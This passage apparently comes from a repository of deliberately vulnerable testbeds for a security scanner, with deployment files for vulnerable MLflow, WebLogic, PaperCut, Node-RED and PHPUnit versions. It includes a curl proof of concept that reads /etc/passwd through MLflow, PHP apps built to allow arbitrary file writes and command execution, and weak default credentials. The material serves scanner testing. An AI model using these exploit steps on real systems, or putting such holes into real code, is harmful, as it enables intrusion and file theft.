12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # See options available at https://github.com/google/nsjail/blob/master/config.proto 16 | 17 | name: "default-nsjail-configuration" 18 | description: "Default nsjail configuration for pwnable-style CTF task." 19 | 20 | mode: ONCE 21 | uidmap {inside_id: "1000"} 22 | gidmap {inside_id: "1000"} 23 | rlimit_as_type: HARD 24 | rlimit_cpu_type: HARD 25 | rlimit_nofile_type: HARD 26 | rlimit_nproc_type: HARD 27 | 28 | cwd: "/home/user" 29 | 30 | keep_env: true 31 | 32 | mount: [ 33 | { 34 | src: "/chroot" 35 | dst: "/" 36 | is_bind: true 37 | }, 38 | { 39 | dst: "/tmp" 40 | fstype: "tmpfs" 41 | rw: true 42 | }, 43 | { 44 | dst: "/home/user/mlruns" 45 | fstype: "tmpfs" 46 | rw: true 47 | }, 48 | { 49 | dst: "/proc" 50 | fstype: "proc" 51 | rw: true 52 | }, 53 | { 54 | src: "/etc/resolv.conf" 55 | dst: "/etc/resolv.conf" 56 | is_bind: true 57 | }, 58 | { 59 | src: "/dev" 60 | dst: "/dev" 61 | is_bind: true 62 | }, 63 | { 64 | src: "/dev/null" 65 | dst: "/dev/null" 66 | is_bind: true 67 | } 68 | ] 69 | -------------------------------------------------------------------------------- /mlflow/CVE-2023-6977/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2023-6977 2 | 3 | This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2023-6977. MLflow versions below 2.9.2 are vulnerable to that arbitrary file read vulnerability. 4 | 5 | The deployed service listens on port `5000` after the docker completes its job. 
6 | 7 | ## Fixed version 8 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.10.0 mlflow server --host 0.0.0.0 --port 5000 9 | 10 | ## Vulnerable version 11 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.2.0 mlflow server --host 0.0.0.0 --port 5000 12 | -------------------------------------------------------------------------------- /mlflow/CVE-2024-2928/README.md: -------------------------------------------------------------------------------- 1 | # MLflow CVE-2024-2928 2 | 3 | This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2024-2928. MLflow versions below 2.11.2 are vulnerable to that arbitrary file read vulnerability. 4 | 5 | ## How to Trigger the Vulnerability? 6 | 7 | To trigger the vulnerability, you can use the following five curl commands. In a vulnerable environment, after the final curl request, you can see the /etc/passwd file content in the response. 8 | ``` 9 | # Create a malicious experiment: 10 | curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create' 11 | 12 | # Associate a run to it (EXPERIMENT_ID is coming from the first curl request's response): 13 | curl -X POST -H 'Content-Type: application/json' -d '{"experiment_id": "EXPERIMENT_ID"}' 'http://127.0.0.1:5000/api/2.0/mlflow/runs/create' 14 | 15 | # Create a registered model: 16 | curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create' 17 | 18 | # Link a model version to the malicious run (RUN_ID is coming from the second curl request's response. 
It is below the lifecycle_stage key in the JSON response): 19 | curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "run_id": "RUN_ID", "source": "file:///etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create' 20 | 21 | # Read /etc/passwd: 22 | curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=poc&version=1' 23 | ``` 24 | 25 | In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them. 26 | 27 | ``` 28 | sudo docker rmi -f $(sudo docker images -aq) 29 | sudo docker remove $(sudo docker ps -a -q) 30 | ``` 31 | ## Fixed version 32 | ``` 33 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --host 0.0.0.0 --port 5000 34 | ``` 35 | 36 | The deployed service listens on `localhost:5000` after the docker completes its job. 37 | 38 | ## Vulnerable version 39 | ``` 40 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.9.2 mlflow server --host 0.0.0.0 --port 5000 41 | ``` 42 | 43 | The deployed service listens on `localhost:5000` after the docker completes its job. 44 | -------------------------------------------------------------------------------- /mlflow/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # setup 2 | ## vulnerable instance 3 | 1. run the mlflow instance 4 | ```bash 5 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 6 | ``` 7 | 2. open http://127.0.0.1:5000. 8 | 3. enter admin/password as username and password. 9 | 10 | ## safe instance 11 | 1. run the mlflow instance 12 | ```bash 13 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 14 | ``` 15 | 2. 
run `curl http://127.0.0.1:5000/api/2.0/mlflow/users/update-password --user admin:password -H "Content-Type: application/json" -d '{"username": "admin", "password": "randomPass"}' -X PATCH` 16 | 2. open http://127.0.0.1:5000. 17 | 3. enter admin/randomPass as username and password which is not the default credentials. 18 | -------------------------------------------------------------------------------- /mongodb/weak_credentials/mongodb.md: -------------------------------------------------------------------------------- 1 | # MongoDB 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name some-mongo -e MONGO_INITDB_ROOT_USERNAME=root -e MONGO_INITDB_ROOT_PASSWORD=example -d mongo:latest` 5 | 6 | 2. Verify Mongo is working as intended: `docker run -it --rm mongo mongosh --host ip-addr -u username` -------------------------------------------------------------------------------- /mysql/weak_credentials/mysql.md: -------------------------------------------------------------------------------- 1 | # MYSQL 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name mysql-name -e MYSQL_USER=username -e MYSQL_PASSWORD=password -e MYSQL_ROOT_PASSWORD=rootpassword -d mysql:tag` 5 | 6 | 2. 
Verify MySQL is working as intended: `docker run -it --rm mysql mysql -h ip-addr -u username -p` -------------------------------------------------------------------------------- /nodejs/node-red/CVE-2021-3223/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nodered/node-red:1.1.2 2 | 3 | RUN npm install --unsafe-perm --no-update-notifier --no-fund --only=production 4 | 5 | RUN npm install node-red-dashboard@2.23.0 6 | -------------------------------------------------------------------------------- /nodejs/node-red/CVE-2021-3223/README.md: -------------------------------------------------------------------------------- 1 | # Node-RED-Dashboard Directory Traversal Vulnerability (CVE 2021-3223) 2 | 3 | This directory contains the deployment configs for a directory traversal 4 | vulnerability in Node-RED-Dashboard with node-red version (1.1.2). 5 | 6 | The deployed service has name `cve-2021-3223` and listens on port `1880`. 7 | -------------------------------------------------------------------------------- /nodejs/node-red/CVE-2021-3223/node_red_cve_2021_3223.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Node-RED-Dashboard directory. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: cve-2021-3223 6 | labels: 7 | app: cve-2021-3223 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 1880 13 | selector: 14 | app: cve-2021-3223 15 | type: LoadBalancer 16 | --- 17 | # The deployment of the vulnerable Node-RED-Dashboard directory. 
18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: cve-2021-3223 22 | labels: 23 | app: cve-2021-3223 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: cve-2021-3223 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: cve-2021-3223 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: cve-2021-3223 39 | image: ${node_red_img} 40 | ports: 41 | - containerPort: 1880 42 | 43 | -------------------------------------------------------------------------------- /nodejs/node-red/exposedui/README.md: -------------------------------------------------------------------------------- 1 | # Node-RED exposed UI detector testbed 2 | 3 | This is simply the latest available version of testbed. 4 | 5 | ``` 6 | docker run -it -p 1880:1880 --rm nodered/node-red:latest 7 | ``` 8 | -------------------------------------------------------------------------------- /oracle/weblogic/CVE-2020-14883/Dockerfile: -------------------------------------------------------------------------------- 1 | # Mostly uses the vulnerable weblogic image from https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3-2018/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore 2 | # In addition, disable on-demand deployment of admin portal to make testing stable. 
3 | 4 | FROM vulhub/weblogic:12.2.1.3-2018 5 | 6 | ENV ADMIN_PASSWORD='tsunami1' 7 | 8 | # Disable on demand weblogic deployment 9 | RUN sed -i '34 i cmo.setInternalAppsDeployOnDemandEnabled(false)' /u01/oracle/create-wls-domain.py 10 | 11 | ENTRYPOINT ["/bin/sh","-c"] 12 | CMD ["/u01/oracle/createAndStartEmptyDomain.sh"] 13 | -------------------------------------------------------------------------------- /oracle/weblogic/CVE-2020-14883/README.md: -------------------------------------------------------------------------------- 1 | # Oracle WebLogic RCE CVE-2020-14883 2 | 3 | This directory contains the deployment configs for an Oracle WebLogic 4 | installation that's vulnerable to CVE-2020-14883 RCE exploit. 5 | 6 | The deployed service has name `weblogic-cve-2020-14883` and listens on port 7 | `7001`. 8 | -------------------------------------------------------------------------------- /oracle/weblogic/CVE-2020-14883/weblogic_cve_2020_14883.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing an Oracle WebLogic instance with RCE exploitable Admin Console. 
2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: weblogic-cve-2020-14883 6 | labels: 7 | app: weblogic-cve-2020-14883 8 | spec: 9 | ports: 10 | - port: 7001 11 | name: http 12 | targetPort: 7001 13 | selector: 14 | app: weblogic-cve-2020-14883 15 | type: LoadBalancer 16 | --- 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: weblogic-cve-2020-14883 21 | labels: 22 | app: weblogic-cve-2020-14883 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: weblogic-cve-2020-14883 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: weblogic-cve-2020-14883 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: weblogic-cve-2020-14883 38 | image: ${weblogic_img} 39 | ports: 40 | - containerPort: 7001 41 | -------------------------------------------------------------------------------- /others/http_auth/weak_credentials/http_auth.md: -------------------------------------------------------------------------------- 1 | # HTTP 2 | # Setup 3 | 1. Create docker images with this command: 4 | ``` 5 | docker run -d --name web dockercloud/hello-world 6 | docker run -d -p 80:80 --link web:web --name auth beevelop/nginx-basic-auth 7 | ``` 8 | 2. 
Verify HTTP is working correctly by doing this command: `curl localhost:80` (add -u foo:bar to test authentication) 9 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | ARG PAPERCUT_MAJOR_VER=21.x 4 | ARG PAPERCUT_VERSION=21.0.4.57587 5 | 6 | ARG MYSQL_CONNECTOR_VERSION=8.0.30 7 | ARG MYSQL_CONNECTOR_DOWNLOAD_URL=https://dev.mysql.com/get/Downloads/Connector-J/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.tar.gz 8 | 9 | # WORKDIR /papercut 10 | 11 | COPY /assets/cupsd.conf /app/cupsd.conf 12 | COPY /assets/image_setup.py /app/image_setup.py 13 | COPY /assets/setup.sh /app/setup.sh 14 | COPY /assets/startup.sh /app/startup.sh 15 | COPY /assets/server.properties /app/server.properties 16 | 17 | RUN bash /app/setup.sh 18 | 19 | EXPOSE 9191 \ 20 | 9192 \ 21 | 9193 \ 22 | 80 23 | 24 | ENTRYPOINT [ "/bin/bash" ] 25 | CMD [ "/startup.sh" ] 26 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/Readme.md: -------------------------------------------------------------------------------- 1 | # PaperCut NF/MF Docker images 2 | 3 | --- 4 | 5 | ### Setup 6 | 7 | There are two different methods that can be used to build the dockerfile images. 8 | 9 | Both are to be ran from the same directory that the `readme.md` is located in 10 | 11 | 1. Using `local_builder.sh` (slow, but reliable) 12 | - Run `chmod +x local_builder.sh`, then `./local_builder.sh` 13 | 14 | 2. 
Using `docker-bake.hcl` (recommended, faster) 15 | - Run `docker buildx bake` 16 | 17 | #### Using the images 18 | 19 | Run the command `docker run -it --rm -p 80:80 papercut_ng_mf:` (see below for the available versions) 20 | 21 | > Note: The `-it` command is not necessary, but it does show the output for the container, aiding in troubleshooting 22 | 23 | --- 24 | 25 | ### Info about the resulting images 26 | 27 | These images simulate a near realistic production environment and are prebuilt/preconfigured to let you get started ASAP. 28 | 29 | They currently consist of two version types: 30 | - Vulnerable (Intended to be used only for testing and in-conjuction with the Tsunami Vulnerability Scanner) 31 | - `papercut_ng_mf:19.2.7.62195` 32 | - `papercut_ng_mf:20.1.4.57927` 33 | - `papercut_ng_mf:21.2.10.62186` 34 | - `papercut_ng_mf:22.0.1.62695` 35 | 36 | Non-vulnerable (patched) 37 | - `papercut_ng_mf:20.1.8.66704` 38 | - `papercut_ng_mf:21.2.12.66701` 39 | - `papercut_ng_mf:22.0.12.66453` -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/assets/image_setup.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | ### Default vars/config used to setup image 4 | 5 | # Setup Page 1 (user = admin, and password = password) 6 | # service=direct/1/SetupAdmin/$Form &\ 7 | # sp=S0 &\ 8 | # Form0=password,passwordVerify,$PropertySelection,$Submit &\ 9 | # password=password &\ 10 | # passwordVerify=password &\ 11 | # $PropertySelectio= &\ 12 | # $Submit=Next 13 | payload_page1 = { 14 | 'service': 'direct/1/SetupAdmin/$Form', 15 | 'sp': 'S0', 16 | 'Form0': 'password,passwordVerify,$PropertySelection,$Submit', 17 | 'password': 'password', 18 | 'passwordVerify': 'password', 19 | '$PropertySelectio': '', 20 | '$Submit': 'Next' 21 | } 22 | 23 | # Setup Page 2 - Print cost 24 | # service=direct/1/SetupOrgType/$Form &\ 25 | # sp=S0 &\ 26 | # 
Form0=$RadioGroup,$Submit,$Submit$0 &\ 27 | # $RadioGroup=0 &\ 28 | # $Submit=Next 29 | payload_page2 = { 30 | 'service': 'direct/1/SetupOrgType/$Form', 31 | 'sp': 'S0', 32 | 'Form0': '$RadioGroup,$Submit,$Submit$0', 33 | '$RadioGroup': '0', 34 | '$Submit': 'Next' 35 | } 36 | 37 | # Setup Page 3 - SetupUserCredit 38 | # service=direct/1/SetupPrintCost/$Form &\ 39 | # sp=S0 &\ 40 | # Form0=defaultColorPageCost,defaultGrayscalePageCost,$Submit,$Submit$0 &\ 41 | # defaultColorPageCost=$0.00 &\ 42 | # defaultGrayscalePageCost=$0.00 &\ 43 | # $Submit=Next 44 | payload_page3 = { 45 | 'service': 'direct/1/SetupPrintCost/$Form', 46 | 'sp': 'S0', 47 | 'Form0': 'defaultColorPageCost,defaultGrayScalePageCost,$Submit,$Submit$0', 48 | 'defaultColorPageCost': '$0.00', 49 | 'defaultGrayScalePageCost': '$0.00', 50 | '$Submit': 'Next' 51 | } 52 | 53 | # Setup Page 4 - SetupUserSource 54 | # service=direct/1/SetupUserCredit/$Form &\ 55 | # sp=S0 &\ 56 | # Form0=initialCredit,restricted,$Submit,$Submit$0 &\ 57 | # initialCredit=$0.00 &\ 58 | # $Submit=Next 59 | payload_page4 = { 60 | 'service': 'direct/1/SetupUserCredit/$Form', 61 | 'sp': 'S0', 62 | 'Form0': 'initialCredit,restricted,$Submit,$Submit$0', 63 | 'initialCredit': '$0.00', 64 | '$Submit': 'Next' 65 | } 66 | 67 | # Setup Page 5 - SetupVerify 68 | # service=direct/1/SetupUserSource/$Form &\ 69 | # sp=S0 &\ 70 | # Form0=$RadioGroup,$Select,$LinkSubmit,$Submit,$Submit$0 &\ 71 | # $Select=0 &\ 72 | # $RadioGroup=0 &\ 73 | # _linkSubmit= &\ 74 | # $Submit=Next 75 | payload_page5 = { 76 | 'service': 'direct/1/SetupUserSource/$Form', 77 | 'sp': 'S0', 78 | 'Form0': '$RadioGroup,$Select,$LinkSubmit,$Submit,$Submit$0', 79 | '$Select': '0', 80 | '$RadioGroup': '0', 81 | '$_linkSubmit': '', 82 | '$Submit': 'Next' 83 | } 84 | 85 | # Setup Page 6 - SetupCompleted 86 | # service=direct/1/SetupVerify/$Form &\ 87 | # sp=S0 &\ 88 | # Form0=$Submit,$Submit$0 &\ 89 | # $Submit=Confirm 90 | payload_page6 = { 91 | 'service': 
'direct/1/SetupVerify/$Form', 92 | 'sp': 'S0', 93 | 'Form0': '$Submit,$Submit$0', 94 | '$Submit': 'Confirm' 95 | } 96 | 97 | ### End default vars/config 98 | 99 | # Local website setup 100 | host = "http://localhost:9191/app" 101 | 102 | headers = { 103 | 'Origin': 'http://localhost:9191' 104 | } 105 | 106 | server_ready = False 107 | 108 | while ( not server_ready ): 109 | try: 110 | resp = requests.get(host) 111 | if (resp.status_code == 200): 112 | server_ready = True 113 | except requests.exceptions.Timeout: 114 | continue 115 | except requests.exceptions.RequestException: 116 | continue 117 | 118 | 119 | 120 | 121 | session = requests.Session() 122 | 123 | session.get(host) 124 | 125 | setup_steps = [ 126 | payload_page1, 127 | payload_page2, 128 | payload_page3, 129 | payload_page4, 130 | payload_page5, 131 | payload_page6 132 | ] 133 | 134 | 135 | 136 | 137 | for step in setup_steps: 138 | resp = session.post(host, data=step, headers=headers) 139 | if resp.status_code != 200: 140 | print(resp.status_code, resp.reason) -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/assets/setup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/share/env bash 2 | 3 | ## Setup Prerequisites 4 | apt update 5 | apt install -y --no-install-recommends wget cpio cups cups-pdf nano curl ca-certificates python3 python3-pip libshell-perl # iptables 6 | 7 | # Add the cups config that opens up port 631 for papercut server 8 | mv /app/cupsd.conf /etc/cups/cupsd.conf 9 | 10 | pip install requests 11 | 12 | useradd -mUd /papercut -s /bin/bash papercut 13 | echo "papercut - nofile 65535" >> /etc/security/limits.conf 14 | 15 | # Get and Setup Papercut NG/MF 16 | wget https://cdn1.papercut.com/web/products/ng-mf/installers/mf/${PAPERCUT_MAJOR_VER}/pcmf-setup-${PAPERCUT_VERSION}.sh -O pcmf-setup.sh 17 | chmod a+rx pcmf-setup.sh 18 | 19 | runuser -l papercut -c "/pcmf-setup.sh -v 
--non-interactive" 20 | rm -f pcmf-setup.sh 21 | 22 | /papercut/MUST-RUN-AS-ROOT 23 | /etc/init.d/papercut stop 24 | /etc/init.d/papercut-web-print stop 25 | 26 | # Setup the Cups PDF server as a test server 27 | service cups restart 28 | lpadmin -p cups-pdf -v cups-pdf:/ -E -P /usr/share/ppd/cups-pdf/CUPS-PDF_opt.ppd 29 | cupsenable CUPS-PDF 30 | lpoptions -d CUPS-PDF 31 | # service cups restart 32 | 33 | # Setup Mysql 34 | wget ${MYSQL_CONNECTOR_DOWNLOAD_URL} -O mysql.tar.gz 35 | tar -xzvf mysql.tar.gz -C / 36 | rm mysql.tar.gz 37 | mv /mysql-connector-java-${MYSQL_CONNECTOR_VERSION}/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.jar /papercut/server/lib-ext/ 38 | rm -r /mysql-connector-java-${MYSQL_CONNECTOR_VERSION} 39 | 40 | # Finish Setting up Papercut NG/MF 41 | chown -R papercut:papercut /papercut 42 | chmod +x /papercut/server/bin/linux-x64/setperms 43 | /papercut/server/bin/linux-x64/setperms 44 | apt-get clean autoclean 45 | apt-get autoremove -y 46 | rm -rf /var/lib/{apt,dpkg,cache,log}/ 47 | runuser -l papercut -c "/papercut/server/bin/linux-x64/db-tools init-db -f -q" 48 | 49 | 50 | # Finish setting up image with default/presets 51 | /etc/init.d/papercut start 52 | /etc/init.d/papercut-web-print start 53 | 54 | echo -e "##########################################\n\n" 55 | echo -e Waiting to ensure the Application/Web Print server is fully started 56 | echo -e "##########################################\n\n" 57 | 58 | # Query the papercut web server until a non-error response is received 59 | # curl --retry 12 --retry-delay 5 -s -o /dev/null "http://localhost:9191" 60 | 61 | python3 /app/image_setup.py 62 | 63 | chmod +x /app/startup.sh 64 | mv /app/startup.sh /startup.sh 65 | 66 | /etc/init.d/papercut stop 67 | /etc/init.d/papercut-web-print stop 68 | 69 | mv /app/server.properties /papercut/server/server.properties 70 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/assets/startup.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | service cups start 4 | 5 | # Port Forwarding 6 | # myip=$(hostname -i) 7 | # /sbin/iptables -t nat -I PREROUTING --src 0/0 --dst $myip -p tcp --dport 80 -j REDIRECT --to-ports 9191 8 | # /sbin/iptables -t nat -I PREROUTING --src 0/0 --dst $myip -p tcp --dport 443 -j REDIRECT --to-ports 9192 9 | 10 | /etc/init.d/papercut console -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/docker-bake.hcl: -------------------------------------------------------------------------------- 1 | group "default" { 2 | targets = ["papercut_image"] 3 | } 4 | 5 | target "papercut_image" { 6 | name = "papercut_ng_mf-${replace(versions.ver, ".","_")}" 7 | matrix = { 8 | versions = [ 9 | // Vulnerable images 10 | { 11 | major_ver = "19.x" 12 | ver = "19.2.7.62195" 13 | }, { 14 | major_ver = "20.x" 15 | ver = "20.1.4.57927" 16 | }, { 17 | major_ver = "21.x" 18 | ver = "21.2.10.62186" 19 | }, { 20 | major_ver = "22.x" 21 | ver = "22.0.1.62695" 22 | }, 23 | 24 | // Non-Vulnerable images 25 | { 26 | major_ver = "20.x" 27 | ver = "20.1.8.66704" 28 | }, { 29 | major_ver = "21.x" 30 | ver = "21.2.12.66701" 31 | }, { 32 | major_ver = "22.x" 33 | ver = "22.0.12.66453" 34 | } 35 | ] 36 | } 37 | 38 | dockerfile = "Dockerfile" 39 | tags = ["papercut_ng_mf:${versions.ver}"] 40 | args = { 41 | PAPERCUT_MAJOR_VER = versions.major_ver 42 | PAPERCUT_VERSION = versions.ver 43 | } 44 | } 45 | 46 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/local_builder.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | declare -A vuln_versions=( 4 | ["19.x"]="19.2.7.62195" 5 | ["20.x"]="20.1.4.57927" 6 | ["21.x"]="21.2.10.62186" 7 | ["22.x"]="22.0.1.62695" 8 | ) 9 | 10 | declare -A non_vuln_versions=( 11 | ["20.x"]="20.1.8.66704" 12 | 
["21.x"]="21.2.12.66701" 13 | ["22.x"]="22.0.12.66453" 14 | ) 15 | 16 | function build_image() { 17 | echo -n "Building image version: ${2}" 18 | output=`docker build --force-rm --rm --quiet \ 19 | --build-arg="PAPERCUT_MAJOR_VER=${1}" \ 20 | --build-arg="PAPERCUT_VERSION=${2}" \ 21 | --tag papercut_ng_mf:${2} .` 22 | echo " --> ${output}" 23 | } 24 | 25 | echo -e "\n" 26 | echo "##############################################" 27 | echo "##############################################" 28 | echo "### Papercut Docker Images Builder ###" 29 | echo "##############################################" 30 | echo "##############################################" 31 | 32 | echo -e "\n[*] Building Vulnerable Image versions" 33 | for key in ${!vuln_versions[@]} 34 | do build_image $key ${vuln_versions[$key]} 35 | done 36 | 37 | echo -e "\n[*] Building Non-Vulnerable Image versions" 38 | for key in ${!non_vuln_versions[@]} 39 | do build_image $key ${non_vuln_versions[$key]} 40 | done 41 | 42 | echo -e "\n[*] Done!" 
43 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php 2 | 3 | USER root 4 | 5 | COPY startup.sh / 6 | RUN chmod 0744 /startup.sh 7 | 8 | COPY index.php /var/www/html/ 9 | 10 | RUN apt-get update && \ 11 | apt-get install -y procps cron 12 | 13 | EXPOSE 80 14 | 15 | # Start crond and phpd 16 | ENTRYPOINT ["/startup.sh"] 17 | CMD ["php", "-S", "0.0.0.0:80", "-t", "/var/www/html", "/var/www/html/index.php"] 18 | #CMD cron && php -S 0.0.0.0:80 -t /var/www/html /var/www/html/index.php 19 | 20 | 21 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/README.md: -------------------------------------------------------------------------------- 1 | # A simple PHP webapp vulnerable to Arbitrary File Write with CRON daemon 2 | 3 | This webapp can be used for testing arbitrary file write exploitation. It was originally created to test 4 | file write to RCE via crontab payload (linux_root_crontab) 5 | 6 | # Setup 7 | 8 | 1. Build with: 9 | 10 | `docker build --platform linux/amd64 -t phpd-arbitrary-file-write` 11 | 12 | 2. Run with: 13 | 14 | `docker run --rm -p 8888:80 --name phpd-app --platform linux/amd64 phpd-arbitrary-file-write` 15 | 16 | 3. Open the webapp at: 17 | 18 | `http://localhost:8888/` 19 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
\n\n"; 8 | 9 | if (isset($_GET['file']) and isset($_GET['contents'])) { 10 | echo "Writing to ". $_GET['file'] . " with contents:

\n" . $_GET['contents']; 11 | file_put_contents($_GET['file'], $_GET['contents']); 12 | 13 | } else { 14 | echo "Error: This script requires both 'file' and 'contents' GET parameters."; 15 | } 16 | 17 | ?> 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/startup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cron 3 | exec "$@" 4 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.2-alpine3.9 2 | 3 | EXPOSE 80 4 | 5 | # Install composer 6 | RUN curl -sS https://getcomposer.org/installer | php 7 | RUN mv composer.phar /usr/local/bin/composer 8 | 9 | # Install vulnerable package 10 | RUN composer require phpunit/phpunit:5.6.2 11 | 12 | # Start up the application when the container is started 13 | COPY docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh 14 | ENTRYPOINT ["/usr/local/bin/docker-entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/README.md: -------------------------------------------------------------------------------- 1 | # PHPUnit CVE-2017-9841 2 | 3 | This directory contains the deployment configs for a PHP Application with exposed 4 | PHPUnit library that's vulnerable to CVE-2017-9841 (RCE via eval-stdin.php). 5 | 6 | The deployed service has name `phpunit-cve-2017-9841` and listens on port `80`. 
7 | 8 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | php -S 0.0.0.0:80 4 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/phpunit-cve-2017-9841.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable PHP app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: phpunit-cve-2017-9841 6 | labels: 7 | app: phpunit-cve-2017-9841 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | selector: 13 | app: phpunit-cve-2017-9841 14 | type: LoadBalancer 15 | --- 16 | # The PHP app. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: phpunit-cve-2017-9841 21 | labels: 22 | app: phpunit-cve-2017-9841 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: phpunit-cve-2017-9841 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: phpunit-cve-2017-9841 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: phpunit-cve-2017-9841 38 | image: ${phpunit_img} 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php 2 | 3 | USER root 4 | 5 | COPY startup.sh / 6 | RUN chmod 0744 /startup.sh 7 | 8 | COPY index.php /var/www/html/ 9 | 10 | RUN apt-get update && \ 11 | apt-get install -y procps cron 12 | 13 | EXPOSE 80 14 | 15 | # Start crond and phpd 16 | ENTRYPOINT ["/startup.sh"] 17 | CMD ["php", "-S", "0.0.0.0:80", "-t", "/var/www/html", "/var/www/html/index.php"] 18 | 19 | 20 | 
-------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/README.md: -------------------------------------------------------------------------------- 1 | # A simple PHP webapp vulnerable to RCE and Arbitrary File Read 2 | 3 | This webapp can be used for testing RCE and arbitrary file read exploitation. It was originally created to test 4 | blind RCE payload (linux_curl_trace_read). 5 | 6 | # Setup 7 | 8 | 1. Build with: 9 | 10 | `docker build --platform linux/amd64 -t rce-read .` 11 | 12 | 2. Run with: 13 | 14 | `docker run --rm -p 8888:80 --name rce-read --platform linux/amd64 rce-read` 15 | 16 | 3. Open the webapp at: 17 | 18 | `http://localhost:8888/` 19 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
\n\n"; 7 | 8 | if (isset($_GET['cmd'])) { 9 | echo "Running [". $_GET['cmd'] . "]

